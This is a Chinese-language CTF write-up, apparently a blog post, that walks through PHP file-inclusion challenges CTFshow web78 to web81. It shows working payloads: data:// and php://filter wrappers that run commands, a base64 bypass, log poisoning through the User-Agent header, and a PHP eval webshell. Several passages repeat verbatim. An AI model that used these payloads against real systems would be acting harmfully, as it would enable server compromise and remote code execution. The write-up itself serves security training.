CTFer——文件包含
文件包含
CTFshow web78
$file = $_GET['file'];
include($file);
文件包含 include函数
尝试使用flag.php 发现不会显示但是页面返回正常 说明文件包含成功 存在flag.php文件
获取flag位置 ?file=data://text/plain,<?php system('ls');?>
获取flag ?file=php://filter/read=convert.base64-encode/resource=flag.php
CTFshow web79
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
include($file);
用replace函数过滤了php
获取flag位置 ?file=data://text/plain,<?php system('ls');?>
这里php可以用大小写绕过 也可以使用=号替代php短标签
获取flag ?file=data://text/plain,<?= system("tac fla*");?>
获取flag(2):
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');
CTfshow web80&web81
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
include($file);
本题过滤了data协议 和php
这里可以使用日志包含
日志地址通常为
apache一般是/var/log/apache/access.log
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
include($file);
本题过滤了data协议 和php
这里可以使用日志包含
日志地址通常为
apache一般是/var/log/apache/access.log
nginx的log在/var/log/nginx/access.log和/var/log/nginx/error.log
通过get传参使?file=/var/log/nginx/access.log
抓包后在user-agent上
加入 <?php echo system('ls');?>
可以查看到 存在flOg.php
改为cat flag.php 即可得到flag
另一种方法 在UA头中加入一句话木马 用蚁剑连接
<?php @eval($_POST[123]);?>
还有一种方法
php:input 可以访问请求的原始数据的只读流,在POST请求中访问POST的data部分 。
也就是传入一个 php:input
然后去post 命令
通过get传参使?file=/var/log/nginx/access.log
抓包后在user-agent上
加入 <?php echo system('ls');?>
可以查看到 存在flOg.php
改为cat flag.php 即可得到flag
另一种方法 在UA头中加入一句话木马 用蚁剑连接
<?php @eval($_POST[123]);?>
还有一种方法
php:input 可以访问请求的原始数据的只读流,在POST请求中访问POST的data部分 。
也就是传入一个 php:input
然后去post 命令
/var/log/nginx/access.log
抓包后在user-agent上
加入 <?php echo system('ls');?>
可以查看到 存在flOg.php
改为cat flag.php 即可得到flag
/var/log/nginx/access.log
抓包后在user-agent上
加入 <?php echo system('ls');?>
可以查看到 存在flOg.php
改为cat flag.php 即可得到flag
可以访问请求的原始数据的只读流,在POST请求中访问POST的data部分 。
也就是传入一个 php:input
然后去post 命令
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探